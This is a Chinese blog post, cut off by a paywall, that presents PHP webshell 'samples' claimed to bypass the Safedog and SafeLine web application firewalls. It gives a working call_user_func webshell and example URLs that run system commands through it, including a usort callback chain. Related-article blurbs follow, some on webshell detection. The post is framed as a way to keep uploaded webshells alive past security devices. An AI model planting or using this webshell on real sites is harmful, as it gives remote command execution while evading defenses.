webshell绕过样本初体验

原创

已于 2024-09-02 23:20:15 修改 · 1k 阅读

23 ·

CC 4.0 BY-SA版权

文章标签：

#android

于 2024-09-02 23:18:45 首次发布

一：前景

在我们日常的网站中百分之一百是存在一些安全设备来拦截我们的webshell的，一般情况下不可能裸奔，一些比较好用的免费waf通常为安全狗，长亭科技的雷池waf等。当我们上传的webshell被查杀出来以后就直接失效。

提供以下几种样本来绕过webshell的检测，并且亲测可以绕过安全狗和雷池。

二：样本

样本一：

<?php

$action = $_GET['action'];
$parameters = $_GET;
if (isset($parameters['action'])) {
    unset($parameters['action']);
}

$a = call_user_func($action, ...$parameters);

call_user_func回调后面。

$parameters = $_GET; 相当于变量parameters接收所有的get传参。在后面的过滤中将action参数过滤。

由此我们构建利用：

方式1：http://127.0.0.1/test.php?action=system&1=whoami 方法1比较简单。

方式2：http://127.0.0.1/test.php?action=usort&0[0]=system&0[1]=whoami&1=call_user_func

方法2使用usort函数来进行利用，usort传递两个参数，一个数组和一个函数。可以去官网查看具体用法：PHP: Hypertext Preprocessor

经历过程：

call_user_func（usort,0[0]=system&0[1]=whoami&1=call_user_func）

usort(0[0]=system&0[1]=whoami,call_user_func)

call_user_func(system,whoami)

样本二：

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

@菜鸟小小

关注关注

15
点赞
踩
23

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Webshell 高级样本收集

07-31

4万+

收集样本，那可是一件很有趣的精细活。从样本里，你可能会发现很多技巧，并进入另一个视角来领略攻击者的手法。当在安全社区里看到一些比较高级的Webshell样本，就如同发现宝藏一般欣喜，我会...

[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令

热门推荐

杨秀璋的专栏

02-21

2万+

这是作者的网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您们喜欢，一起进步。前文分享了微软证书漏洞（CVE-2020-0601），并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程，第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章，希望对您有所帮助。

参与评论您还未登录，请先登录后发表或查看评论

记一次学习--webshell绕过

banliyaoguai的博客

08-31

1139

这道题目要读取flag，且当前目录下的文件数目要大于三才可以读取，然后这里的思路就是创建文件。上面题目，下面的call_user_func有一个可变长参数，这个可变长参数是$parameters然后上面有一个if语句判断$parameters是否有action，如果有就删除掉，然后再action参数传system，在parameters传你要执行的命令。我们这里也要想办法利用A中的f，这个就要利用ob_start，ob_start调用例子，这里和call_user_func调用差不多。

第三篇—基于黑白样本的webshell检测

Lucky小小吴的小屋

06-16

1132

> 本篇为webshell检测的第三篇，主要讲的是基于黑白样本的webshell预测，从样本收集、特征提取、模型训练，最后模型评估这四步，实现一个简单的黑白样本预测模型。 > 若有误之处，望大佬们指出

网络安全-webshell绕过，hash碰撞，webshell绕过原理

m0_68976043的博客

09-21

1715

那既然这样我们怎么去处理呢，这个是非常巧妙的current是返回当前数组的元素，也就是当前数组的值current，此时它就从current重新变成了current($_POST[a])($_POST[b]),变成它a是一个数组，b就是你的任意命令。当然，这只是两款免费的webshell查杀工具，当前我们算是绕过了，但如果是花钱买的，这个动态传参多半是可以监控到的，因为用户可以控制，至少免费的绕过了，如何去利用呢，call_user_func老朋友了，回调函数。

webshell大集合

06-02

好不容易找来的一些webshell源码，很经典，供大家学习，提高！！！

网安面试题总结_1

qq_42041946的博客

06-06

788

#创作灵感#助力网安人员顺利面试。

网络安全渗透测试——名词解释

weixin_43778463的博客

10-12

3949

常用术语解释

信息安全概述

Thewei666的博客

07-05

1361

一种恶意程序，可以感染设备、网络与数据中心并使其瘫痪，直至用户支付赎金使系统解锁。

各种WebShell.rar

02-06

里面包含了ASP、JSP、JSPX、PHP、pl、py、net等各种WebShell，很全面，还有一些caidao、Web木马样本等，此外还收集了一些各路大神制作的。希望能对学习渗透和网络安全的朋友一些帮助，

第10篇： WebShell高级样本收集1

08-03

1、JSP高级对抗样本 2、GitHub上5k+ Star 的WebShell收集项目 3、Webshell收集项目

国外webshell大集合

09-27

从一个网站下载的WEBSHELL的大集合，和大家分享。

基于机器学习的webshell检测（一）

jliang3的博客

03-08

4931

本篇主要讲述，如何使用机器学习的方法来对网络安全中常见的风险点：webshell进行检测本篇会使用LR ，XGB两种模型进行测试，下一篇将会使用深度学习方法来解决该问题 (1)首先我们简单介绍一下什么是webshell： webshell，是一种基于互联网web程序以及web服务器而存在的一种后门形式，主要通过网页脚本程序和服务器容器所支持的后端程序，在web服务器及其中间件中进...

使用深度学习识别webshell

梦想闹钟

05-14

1135

在做毕设的时候选的这个题目，实际在完成的过程中也有了一些收获，在这里记录下首先是样本，webshell黑样本主要来源于github上的webshell收集项目，白样本来自于github上的开源框架。我也尝试过asp,jsp语言的恶意脚本识别，其实识别效果也很不错，能有95%左右，但是asp,jsp这些语言的恶意脚本数量太少，只有大约1000个左右，说服力不是很强。php样本的数量和质量都要高一些，最终我所搜集到了5000个webshell，以及10000个php白样本样本链接：https://pan.b

测试 35 个 webshell 检测引擎的查杀结果

知白的博客

01-31

3212

最后一次绕过测试于2024年01月18日进行，共使用了国内外共35个现有的查杀引擎进行测试，成功绕过34个，绕过率97.1%，长亭百川WebShell查杀引擎绕过失败

网络安全-长亭雷池waf的sql绕过，安全狗绕过（5种绕过3+2）

m0_68976043的博客

09-23

7335

雷池官网docker安装我的版本是看官网介绍主要防御top10。

牧云Webshell检测神器

ailx10

11-01

446

最近一直在加班搞案例库，从接到需求到完成编写，只给了1个星期的时间。虽说是一个简单的活，但是也是费时费力，安全服务团队编写的文档，需要做大量的修改，才能成为产品中的一部分，各种截图还需要规避侵权。比如出现了xShell，还收到过律师函，就像拍电影里面，坏人不允许使用苹果手机一样，用了就是侵权~感觉好久没有写网络安全方面的文章了，这个一直是我的内核，不能忘记的。大数据、人工智能学的再6也只是外衣，而...

安卓录音方法